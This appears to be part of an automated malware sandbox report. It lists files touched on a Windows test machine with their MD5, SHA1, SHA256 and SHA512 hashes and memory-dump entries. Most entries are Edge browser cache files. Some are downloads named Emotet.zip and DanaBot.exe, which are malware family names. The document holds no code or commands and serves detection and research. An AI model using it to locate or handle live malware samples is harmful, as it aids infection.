| SHA256 | 37c30639ea04878b9407aecbcea4848b033e4548d5023ce5105ea79cab2c68dd |
| SHA512 | 8cb60725d958291b9a78c293992768cb03ff53ab942637e62eb6f17d80e0864c56a9c8ccafbc28246e9ce1fdb248e8d071d76764bcaf0243397d0f0a62b4d09a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | aaef846c22bf5cc894dc1f876807db3a |
| SHA1 | 336c083cf3683a3a8647f563a01cf5c6648d091d |
| SHA256 | 4c05e15c5dd665dd798ca66ed62ba43b4f94368852f1c3eddce9a0cf7f99bf4b |
| SHA512 | 4c3675a2722fcd2813223c8cfdc47e940caac85776bfb02ec0a18e0099c4f0dba1e348502435b99f6061dad99fdf3d49b8154bba0f506b008482e433a7315287 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1
| MD5 | 01f25f62ae16b772baf18921ba5ca832 |
| SHA1 | d54b3110ac3b893f3cb96a294ab7ab3d0fdb4252 |
| SHA256 | 65934a316c0b392ecb0a7a6503d08ce5fab11bc173d1a307783b703889dbd44d |
| SHA512 | dd4417744ac092bb93a20961e2822249e1eb1c90da8d3f014251caa575e4632c201e37fd468f0c8b70642961424110a7d149e7754c004c57706680af01e69817 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\99d9cfc8-60b3-40f5-86fb-3174ad33a7bc\todelete_170ce29fd1bcbf73_0_1
| MD5 | 1b8e81eb4a7a4b5746f24c63976aa9b5 |
| SHA1 | 8941522bdcebc667d91a3c09d24b7d411b0c2c43 |
| SHA256 | aa0cd8b55383952cc0bd9f32e241255bd7deeb2869383b5c5d3d43a7ae17ae2f |
| SHA512 | 9ed729c270734122a18a290b85737e8f12cce135ffd78c41c3ee0e67b507923ec7d223f69d13db6c5d3f7bd3c1e8b43aba566f2190e28f4891493d9642256608 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007a
| MD5 | 6a2298e92f4163f3ae75a1f2a2373bdd |
| SHA1 | 3fea68ab27bfc355df8ac421c060e57240c3a32a |
| SHA256 | b3ee43775d0371a665bda8ab4a43206bef23c6ab588fae0b11c6b51815643538 |
| SHA512 | 2ee61fd022c2041e66beae1b5ae0f8455a0f733eb85475b20c0478a886e8d27af1186ce6e43e1b4dda6fceeb09422af581afdc98c1878942bc4f9cb7cfefaa63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007b
| MD5 | 5e6b051c31199c6614bed20c947bc54d |
| SHA1 | 21c5847d89fe9abf79366f242d7369eef1675485 |
| SHA256 | 597b0f330bc6b91a1a4f02de5b88c45f94d632b4abf32ec981fbaf27e3fe8fc6 |
| SHA512 | 7d128c4254b2395a1123ae6d5fa2b8546036aaddd3ad8c8ba60fb7292496ebb8eddf22041be0b4919bee845575ecfcbd9d874610ffb4693f9d2c19a088b11dc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007c
| MD5 | d25109c9249b77c7cf2a90dcd2e88db2 |
| SHA1 | e12430ee61c1698aff70939b795e96a2ab1a51be |
| SHA256 | 7d041b993ab544156abba66cd25edf215aa063fa84d5742d5dafa781f92e762d |
| SHA512 | 7b0c7dafa6b1add8befc416474414681fbf077844d227dc3e4862fc04723a030749113114f0780401ab383ae595b3f7c11d8283dd5a7df6d9e6b68f0c72d0bf4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000079
| MD5 | 004cd6b24939efe80141635f03318fbe |
| SHA1 | c9e143443321e37482e396f17090a92bef7c2f6f |
| SHA256 | 03dd1cdbf231b2a5f17e69fe02b00491c7df05f088a9115873b29c44b418136c |
| SHA512 | 9fc250fa7aca967afe9ada874bc0444241a9e9566b4bba9c9130a72b492a361e23158cad33953fb71355d10a1c1e4ce0d97173543da310d66c0c0017c22c196d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000086
| MD5 | 557c3215b8d09f848bd88c7626ec628a |
| SHA1 | 8564d0d5ef1f61cd1b4fcf5cce2464410fce0f47 |
| SHA256 | ac1e7c3cc85c914952c6b6878d4c56095f7068575f18e7bcedb0a91d3a198025 |
| SHA512 | 79f140c407c94b188f34e9ed85992f1a5c12488f8d0557a677d8b61b2e19a65a234572195680ba3e9c0749455ed67c6b73303cdd66ffe000f6318d7f63adebce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000084
| MD5 | 692b062598a56463f83fbd4924c0bdfc |
| SHA1 | de2240de95a063b8d34d648649d380b561f1f98c |
| SHA256 | 096e82e0553d7162ce7ab59c76aab5ee6f3568e0fcb32fef84d36f398e3096cb |
| SHA512 | 9d34cbe1bf14f8166c8cabcc7affea6c7eaeebe162659a5906b5765d011f4448ccb7ec6e923da0734e0996c26fab39bb583f38fd1f6094613b46624685f72b03 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000087
| MD5 | 2c46cffbdcc1e68c2737966bcf69c809 |
| SHA1 | 95c87f727319d969a3148d52e6206b5f010e8912 |
| SHA256 | f9f26bacd62a3e5b2b69d4e6a32674cb514bf8fec3341e7807fd942b6cf98ff9 |
| SHA512 | e826c327cb2df2084ccf72972fb0010c853341c65ef99eac9a26b4013b59a1f8c29572b684ce325db83e26ae03fe67b69ebb13c21f0f4b8cbe67ac65bf7d50a0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007f
| MD5 | 3f3297819cd2b781023bb50471132691 |
| SHA1 | 206d8863f895adc7cd368b454c86715ba027a688 |
| SHA256 | bd2aadbf00196cc0ac2fb4c03e46c10ae55675b44caa9d3419d8f71662841173 |
| SHA512 | 12749e9126de711f23204455aaf9992e02102cf5261e91c3e9f43016a80b83f72854188baed529c0b1ea0c8d78c031e30b2cd70a532e85fd93d1c509fe7965a6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000081
| MD5 | 0cdf3ed0f9e33c60eaab0dc63bd7faab |
| SHA1 | 20c5aadade28bab3a27743457140bffdeab3b3bc |
| SHA256 | 4fee7076cacf49b6e7b9da33cd6f61597b11d81461d92e5f2edd5affd0c01c99 |
| SHA512 | 5ba3e530f61e7246e72cc2839324d7bc36339f080bef5e778d4ed2c1de29dc227e195dbe98c6bf77a224097dc8af111111cb9c12c204a471fa5f816e27082b21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000080
| MD5 | 850de9aea95ade483d7a878b4e00f847 |
| SHA1 | 40f4982370a6f9793e469a5fbdc5c273880149a0 |
| SHA256 | 5da6ed93059933b7aaaf811fe84cdd98b952e2b08ff08050e5d914f30185fce7 |
| SHA512 | 351788e6b2c22c40f007c7d17ce225dddcaa3efaf3a7cc4ee815fb70412157b067d22fde0905710e463ed431540f697aefad1030375934ff533ec473a5f397fa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000082
| MD5 | d1ef293edd60ffccf1168e67160e5e41 |
| SHA1 | c9559d6d6f344841cbd48772dff84c8687fce93c |
| SHA256 | 65d90d61f7fd051c6a63c3f093a22b1dc24ddbcf8c720dc320d5b32b2cf8ab86 |
| SHA512 | ac24cdec31c9d90e8edd37878377d315ed5c2a166295485eb3a69527744008ff747b985de6a992a5951aec0b3be7a88264900a83d15d3669d4705baf78ba213e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000083
| MD5 | 8f850aaafc8da0df7f8f0a0b682a934b |
| SHA1 | ef55df2e866abed76fe19b05ceb51c1147a6961f |
| SHA256 | d40ca516a00f4b6ae9937cf0eaa8e1f0c2033aaf783dae3c461d68b8b142bc4e |
| SHA512 | 15160500824282d1e829908670dc7405abeb4d571ffdcf94532f55294fce77552c832f27fc14b91141ffd2aa142c441fd8e48df8e43cdbfe9283a043da2460dd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008a
| MD5 | 8906181a1838b7c238c5adeb620b9884 |
| SHA1 | 8d599ba37776f64e64881703f13dc8cb31e9e7da |
| SHA256 | a3165cfe81d4d16fc14ff0e4858bdea74ba1b572eef3f1bde01dbab91b80af1d |
| SHA512 | 49d19d31a859910001b5b99d424ea6a39e131cc98c121d5b751623b125f14163c409ecbd7f6b3b5e14e3227d64657ed32ef613eea2223089b56b90a4c311439e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | cc279d2936a33f7a76006f24f0560aea |
| SHA1 | dbb5cf64b9ebc4bf11d71c4b93919bec6f6b8740 |
| SHA256 | ae9aec5215e925133a2a09ac5012fe139a3e06a8edfa800a2b70e9d8bbf9106e |
| SHA512 | 4fe395502cd8ae5502d7dc8a243d00c1881175982d44c9c446ecc69f01878540201b8cd717da08edef94a6b95260a7f10e04b5a89de8451a1f5be40fc61879ec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a8
| MD5 | 9462dddf858661de4330aea22c64ad2e |
| SHA1 | 4a0eaf45ece2eedf1019f2809b690bd921ccb7dd |
| SHA256 | ec3af222a6ef45f54174275269e64e43d5695b0858330a1fc849c4a9ebc71eeb |
| SHA512 | 84bf8f56ad8764ad4dcd3d3cef34e316c5e1451bf3a220909ee6b99d64faf2f3015cd41ca3b83d77dd30379fb5d4573bf4ddfb18bca93ab781bde83be64bed67 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009f
| MD5 | ea94a29739856ce4ac440c9862c0acf0 |
| SHA1 | aefe7c4beed1d1a2dd089e8a1d7854fb35f5d248 |
| SHA256 | ba6ce1d0426319ef6de38a68fa80a2027d921ebb7465eb7b530ab41a41c5433c |
| SHA512 | e56d2d4a84a06a78c1cb552dad9e5c8f68dd63394d4b0f1de236288da74a279c1de6ed8de0dbf5b507909be8f88e9ad147f0e7e06798a38a09afeb4f9397b9ee |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\99d9cfc8-60b3-40f5-86fb-3174ad33a7bc\index-dir\temp-index
| MD5 | 98e2a9502a9caa31b358dc3b0b08fecf |
| SHA1 | fa5fbe604221722596e829fc8b2bd00fbb3b0010 |
| SHA256 | 1d5f70100528f540d9b8b6692095629ae7672f29327463dc37f16a34380228dc |
| SHA512 | f30d8955006ffccf04c2e9cf6e7fa71f847ef26161617241e4be88c85f6414173851ce43bab89308c598f912ead6bf1b74ac780848275a8c27cdc43158d664bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\99d9cfc8-60b3-40f5-86fb-3174ad33a7bc\index-dir\the-real-index~RFe5a3ccc.TMP
| MD5 | d391203b72098488296a29adb471b5c8 |
| SHA1 | 483bb9fc39edd24e9382c9d8fb44c227b845ac33 |
| SHA256 | 7d73ce11bf14da560532f5f91f6ad9fee309f98a50f7d31ea16728bb3ce49c7f |
| SHA512 | cff750c3897cf68f9c757ab97b3df2bac4df30b65354242dac76e918dada022c724ec945decd0b6cf3599b96a6eb331a8283ae54464b96b3d23314cf5187f697 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6fa6d78f-3ebf-4b4d-9d08-6a50964237ce\index-dir\the-real-index
| MD5 | c92eef21c5fb1a1a81058099f32ef713 |
| SHA1 | ec51e6bf11217bb49198ebac30245571ea8f8e97 |
| SHA256 | 4feb0c6c9f0df2ed6f29d1b5c79b1aa54c370d00cf038477b5f10f322c81e464 |
| SHA512 | f947e4cab460202010ffe9fb97bc11e91ffd60e29d432879a2d42f7fef6460b6928bc15875dc60119c260eb40ec0fdd93e96889372f22f0518c8e18c10c37956 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | f42c58356639de9129865fddb5ade2cb |
| SHA1 | e8b1309a90c4805a25770dde5c1cf76509ed0b3e |
| SHA256 | 634be816c8ace06ffbf56bd6418d5ca1d041e47e59a3cee2db4ef83346dc7941 |
| SHA512 | 4b6ac18117e17ebfc0a9a11e097892f15689e7f6ce1ac32e3e8654734a033202a09632999f3341c15c99dcd3603d4223238fc2f75c1e5807c547aa57c4aa3897 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6bf5d2a41a68dba3b88d7f0a34e2a217 |
| SHA1 | b8f37b355cc2500aadf9fc5792065b8aedd7c000 |
| SHA256 | f3096c162df5f3051f8ac02e0d5f306a396231e893d5a5c488ea0289e5841629 |
| SHA512 | 601e4ab949de7e636edf5ba49cf8f3c951094a9dca866e98c22cadcdc28eaa0c07e1e0c7a788c86deffec79f6eaaa57e747932d8e002d5c5d5f07cd596ae8846 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1979939502\manifest.json
| MD5 | cb10c4ca2266e0cce5fefdcb2f0c1998 |
| SHA1 | 8f5528079c05f4173978db7b596cc16f6b7592af |
| SHA256 | 82dff3cc4e595de91dc73802ac803c5d5e7ab33024bdc118f00a4431dd529713 |
| SHA512 | 7c690c8d36227bb27183bacaf80a161b4084e5ad61759b559b19c2cdfb9c0814ad0030d42736285ee8e6132164d69f5becdcf83ac142a42879aa54a60c6d201b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\edge_autofill_global_block_list.json
| MD5 | afb6f8315b244d03b262d28e1c5f6fae |
| SHA1 | a92aaff896f4c07bdea5c5d0ab6fdb035e9ec71e |
| SHA256 | a3bcb682dd63c048cd9ca88c49100333651b4f50de43b60ec681de5f8208d742 |
| SHA512 | d80e232da16f94a93cfe95339f0db4ff4f385e0aa2ba9cbd454e43666a915f8e730b615085b45cc7c029aa45803e5aca61b86e63dac0cf5f1128beed431f9df0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\v1FieldTypes.json
| MD5 | c1a0d30e5eebef19db1b7e68fc79d2be |
| SHA1 | de4ccb9e7ea5850363d0e7124c01da766425039c |
| SHA256 | f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1 |
| SHA512 | f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\autofill_bypass_cache_forms.json
| MD5 | 8060c129d08468ed3f3f3d09f13540ce |
| SHA1 | f979419a76d5abfc89007d91f35412420aeae611 |
| SHA256 | b32bfdb89e35959aaf3e61ae58d0be1da94a12b6667e281c9567295efdd92f92 |
| SHA512 | 99d0d9c816a680d7c0a28845aab7e8f33084688b1f3be4845f9cca596384b7a0811b9586c86ba9152de54cafcdea5871a6febbee1d5b3df6c778cdcb66f42cfa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.reddit.com_0.indexeddb.leveldb\000003.log
| MD5 | b55e4d64cb83df864b63567176cdeae7 |
| SHA1 | 855456240c5afad456507851f071f37feecab1b3 |
| SHA256 | 25efb363db4bd2e6727594fb74abe48b523ed9cd9764e3fb7218db6a55cafef6 |
| SHA512 | cfa673554ed97857730109c6c359244e238eacd374879cb05d2f66ad19527ea405f6c7ffab119743c30cee7f5765450b3ae4453c23156f672fd4994f82ac20a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 9bffe596601534f6aa973ab935f4084d |
| SHA1 | b124164a74737a8d50710352c06d99572b6698c7 |
| SHA256 | a5b865bf7aa01b492ecf0db001aa95487219c7ca4f57a3ab14c7007a0a8e82fa |
| SHA512 | 152d3852c29b0e396d20bf018756fa8d406750b5b505620a9dfdacbba84d0854dd42258e25027906a79a5d5a50d6d34a3152a4555c76d0b6382dd62418c57688 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\7f903dcbe069fdcb_0
| MD5 | 91abcfca498a5068332891c8269a9ff2 |
| SHA1 | 4089bc06a760c896d9bf132d00118c6e1a4b1806 |
| SHA256 | 89aad2b46a541c9c651d529aa16b300a9c7b8c3ea6a7bc3a32719d8071420391 |
| SHA512 | ca404cfbdb87bcd451e7b9d0e30d950f5fae0460062e8710f378c1fa5f95a583efa2ceb4d5a47a5853afbfce1285f75703873f0d19157b81f1ea3c22ebf7864f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\af2cfcaf6d9b18bc_0
| MD5 | f33d0528c4b5fce1c7131f44f7b6ee40 |
| SHA1 | d386454a96fb4325f05fb2ea83ff8a82c8f631c3 |
| SHA256 | 6acc88a2be5db492120e4d288cc7727504b442e88bef5e908ece4d2b3621c4a6 |
| SHA512 | 624b5015530731d70092bf939675c2346bed28a0cb72546b5a4b674393a7440dde24923948e0442365d0fde2244c376bdecb27855055d0ab7805e8191fbcccec |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4e9b18b0f66a7183_0
| MD5 | 1c20903fa5c85aabfa10b258d9311816 |
| SHA1 | f47fc44aa6265c72f5880109f845981d2e672397 |
| SHA256 | e89054b4f14fa3da1e3b85abe9308d4062cd8cc9c804aac073f8b22cfce5ccf3 |
| SHA512 | 12cfecc2337ce7b7a77d4c8fe1c2924bc986ba049edbee84278d48156943807bf83e6e033ad67c557688752751d7da8c25fc61df10be4fd97b5b1bb31c9d498d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | b7687a6ef0dbe7c604706de39146e4ee |
| SHA1 | 18eb2e035404f5858c815067eb88301a7c250546 |
| SHA256 | 14aac359a246c42d8965e3ced45e93a318f35036ff71b5af49bb63b2a9a981b6 |
| SHA512 | 1a57c0c3bda576dba4ab34398ed874c5908f3d03bc7ad66eb815dbd8bda78e4d5a6ab9b33022ef2fd234b4d1f7f4f1ecfd1285d451eee92e38ee0da6642066f6 |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1639348720\manifest.json
| MD5 | 22b68a088a69906d96dc6d47246880d2 |
| SHA1 | 06491f3fd9c4903ac64980f8d655b79082545f82 |
| SHA256 | 94be212fe6bcf42d4b13fabd22da97d6a7ef8fdf28739989aba90a7cf181ac88 |
| SHA512 | 8c755fdc617fa3a196e048e222a2562622f43362b8ef60c047e540e997153a446a448e55e062b14ed4d0adce7230df643a1bd0b06a702dc1e6f78e2553aadfff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.3.10\data.txt
| MD5 | 60beb7140ed66301648ef420cbaad02d |
| SHA1 | 7fac669b6758bb7b8e96e92a53569cf4360ab1aa |
| SHA256 | 95276c09f44b28100c0a21c161766eda784a983f019fc471290b1381e7ed9985 |
| SHA512 | 6dfa4eca42aea86fba18bc4a3ab0eed87948ea1831e33d43426b3aca1816070ecb7fd024856ad571ca2734214a98cc55e413502b3deef2c4a101228a7377e9d5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | d00e0553bd303a80dd023928d70c0fa9 |
| SHA1 | 98c8641bf7763311898be3e867817ff9c72a7fb1 |
| SHA256 | 1dbc9bc4b5434e9300054f639b881cd83e0731f8800b5aedc84432c99e60b820 |
| SHA512 | 1a86df901fdef785ccec933a84b1916de0e80fbfb1b695a4fc65e5ec689c279309f9d8a27e4adfe83d7585073b2b54015a9b72ef123c4efd3b64ba3df71628df |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 6e3a1c50f1ad0c23f5b1e86d96fba86b |
| SHA1 | 494382a22eb895d78a7ef78fa42f53b325996371 |
| SHA256 | 2e6662da0fa5153ca3bca29db6c4dee65cd836aab7e95510cb16406543dec86d |
| SHA512 | 9e418987cc25b191956ecd104984ef4ecae26850fb59d0db20a15c067e8ccb7c4a43c7a57a1cd89e6b53e00f3ca6c7673d1bae5caf9ec7070b45d4816f26ed30 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | 3159664e4a67c64e16220dcc8586be98 |
| SHA1 | 3ac34156e240fd1cdbbc868b467aed87b4bab0c5 |
| SHA256 | c1dcb7bca9adfd66230f510c0cfe8689b05069528198c68250c0b7fc922795e1 |
| SHA512 | 4729e0a50f3e48210c290dc4c3be2e48f11e41669f7c83d93ca95ca65a5c059fb7a690335b799117e846d715cf91fce1c8f3a7cece4d362381f913fe16e83965 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | bf3899b789ee8a6bc78f54c376ddda0c |
| SHA1 | f61720b6a10b072178f53abded00323373c226a6 |
| SHA256 | 056f0e4823fc9d83e9cc8eff7ec2a5e8b293d23550cd0aa88d5ee4a9d37a2066 |
| SHA512 | 2373c69064afc56854b38e8404cfe90f365f7fd79273c3f7cfa545c6f88a581ede43bf1f868363280aaf65011d5d0b196fc382edef4fad1548b5a6639861e9cf |
C:\Program Files\chrome_Unpacker_BeginUnzipping2864_1595283012\manifest.json
| MD5 | 78b473ee6bb38cbb39886624887efe63 |
| SHA1 | d40fe3eba931ed08c8a68907ba20773a9987b3ce |
| SHA256 | 3a4a45d0995fcb759016fd1d875e1fc913a14236e8f7d3ae31930ee3f0477329 |
| SHA512 | 92d03db5c60d0a805c896865e245e25ca43675677237e2dc38e82336cd3ac239e0dd878046d5bbfa50ec3206392857ac3305d64da6d1605e22b76a4f3e69ad18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Typosquatting\2025.4.20.1\typosquatting_list.pb
| MD5 | 488a70b7d4621e059e32d395221223aa |
| SHA1 | 774b5a2124f5c3d8d210020dc53e5033b04a5f76 |
| SHA256 | 8c87afec8dba2f1a072c3fbecc7fa8fb81e93a64639bf9c00e24b4bb712b57a6 |
| SHA512 | bab1b4716e5faf0054cc93a969d1a79e6ee9d11d054d102afa0ba564142f444cbe9508aa013f118b701e4ca5283b0ef5a3a4859a67709a441bcbb8b25e78ca09 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | c7a378f5ad9ab6d192eddbb34428f638 |
| SHA1 | 9b98b1406bce1bf097230cd68aad48650be48d31 |
| SHA256 | e07a4be4fb8925de7d32b6e16375a47fc4edb3031dec69c77eec8d8f0cab7ab3 |
| SHA512 | 446620064b338155f3b236a5dea4c4b4400f6c1099fa46fc0429e44c5a65988e6df93111645aeb6c8830287a3fff48a35438ac34ac68ff8ba6eef618e2220442 |
C:\Users\Admin\Downloads\Emotet.zip
| MD5 | 510f114800418d6b7bc60eebd1631730 |
| SHA1 | acb5bc4b83a7d383c161917d2de137fd6358aabd |
| SHA256 | f62125428644746f081ca587ffa9449513dd786d793e83003c1f9607ca741c89 |
| SHA512 | 6fe51c58a110599ea5d7f92b4b17bc2746876b4b5b504e73d339776f9dfa1c9154338d6793e8bf75b18f31eb677afd3e0c1bd33e40ac58e8520acbb39245af1a |
memory/2264-4787-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-4789-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-4791-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-4790-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-4788-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-4792-0x00007FFE35CE0000-0x00007FFE35CF0000-memory.dmp
memory/2264-4794-0x00007FFE35CE0000-0x00007FFE35CF0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\8b0d4544beb97a69dbb9583fca5575a9aba6e37d.tbres
| MD5 | f3639086b7dc38795f4881306e9ba26d |
| SHA1 | d062b43ffd5fba206285955ec646730942238d05 |
| SHA256 | 5ee248648d7e604148100f150ce18228a5ee171317e8747c1308337e03f33044 |
| SHA512 | bc182d39898d7f1fd3dc4486fd8c7dac7844a960b23d6938e23f519ea0c082cff34509a4553e49fd970c015859566a4c98fd3d320f41db7e98c41d73f2cbd7e8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\83C73DAE.wmf
| MD5 | 350f058bbd6caaf3a698a6f84d43a832 |
| SHA1 | cc40a3f37c06192611b7e676425f954d8bf30e68 |
| SHA256 | af306eb71cf35fafb9a5803311ca401a93558e3277ab287e37deb63dc94416fe |
| SHA512 | 8baa63e9bf5f5befcb833329ac72c910cc3bd20615a1eb3a8e17b70868008fbdce21a064abe1cbccc31a4b82b8dbf003f3aa2652d48b95888f0cb03aa5c1d638 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1B4F74FD.wmf
| MD5 | 9c21bdfccb67426e0b8ae5eefa3e0178 |
| SHA1 | 302b1958b970ec7498f9c15c44816464eb1ca40a |
| SHA256 | 73e094d5c1e2646a1fba25af2fa8347a7c27626e7ef1f8b3ff886e73141fe5d2 |
| SHA512 | bf121d618fc380f281fde56b3c52fee7c43e2bf9b71e09c06ce55c2c0ef866a669db60f6c543f487323a304f0f83377345c7b0a82bf1be41e77bc3c474da2c63 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_te51f0bi.bb4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3864-4972-0x00000271C1F20000-0x00000271C1F42000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 60dd226ca30bfc6621f0c7e562ecb72b |
| SHA1 | 7f2cc0ad41fd4ea9cd4bf97862e3f5b9d5848131 |
| SHA256 | 64ae21fb4af2faecffc3dc332df890fad7d531021603f3285be78bc01764bc05 |
| SHA512 | 89382e93afb85c6fca08666460004ea94c5041aab9bcad187d934a205d804d04b6f2050b12f4dbeafd2cd80b5cb3fbec4a21f0aca033ac312b2c4d2348c67b8d |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
| MD5 | d29962abc88624befc0135579ae485ec |
| SHA1 | e40a6458296ec6a2427bcb280572d023a9862b31 |
| SHA256 | a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866 |
| SHA512 | 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 36a80620e5fc20803296173160e46f39 |
| SHA1 | 49b34da232dd5671a3023db6cf8c78a4ff5f6d46 |
| SHA256 | 8fe92ef0aadca3e5aef200f5c40ae763ee88dfb58bee5ab078ebeeb1fc853d25 |
| SHA512 | 51f64d1e38a9387f87e13164da0202294577101b50c67b38c08df779caaf02aee68f9e5b416d7fd8f5746ddb38eb0db6e7cca804af2bd686bbf8912926b9bee2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | f4eed605f282bf20031b77dc1df94594 |
| SHA1 | bd6f75c0ec2a6324d0242be3c9f3acfa1ef67577 |
| SHA256 | b338cdb8b72366023921fda5887b61017841596f37223f2d0840a7f9b28f0648 |
| SHA512 | 8d89908a94afd29bd893f24105f23a1e14661d0ffaac3f8bd3154afdee3116b9168f7d3b6f46a799a2cfac7c9822adbce826d8ec883136647bdd7c60cce51029 |
memory/2264-5098-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-5101-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-5100-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
memory/2264-5099-0x00007FFE37FB0000-0x00007FFE37FC0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter
| MD5 | e9bb0e77abfc2521e8e53b6598116205 |
| SHA1 | 07f59fd83a48153c81f72d891405ca59887afd4f |
| SHA256 | f20b537bddf0ed50748a2295dfb263a9fa2a5a037daa8b96acf0628681b0ae70 |
| SHA512 | 9cc688e1ab7fe255e9a259e22bf9f77829938f889b4920b7951d0832361ea5c5242caf0824d3e850dea9ce88f0a9e5687cbe279e7dae3f1a41dc8310e5d0802f |
C:\Users\Admin\Downloads\DanaBot.exe
| MD5 | 48d8f7bbb500af66baa765279ce58045 |
| SHA1 | 2cdb5fdeee4e9c7bd2e5f744150521963487eb71 |
| SHA256 | db0d72bc7d10209f7fa354ec100d57abbb9fe2e57ce72789f5f88257c5d3ebd1 |
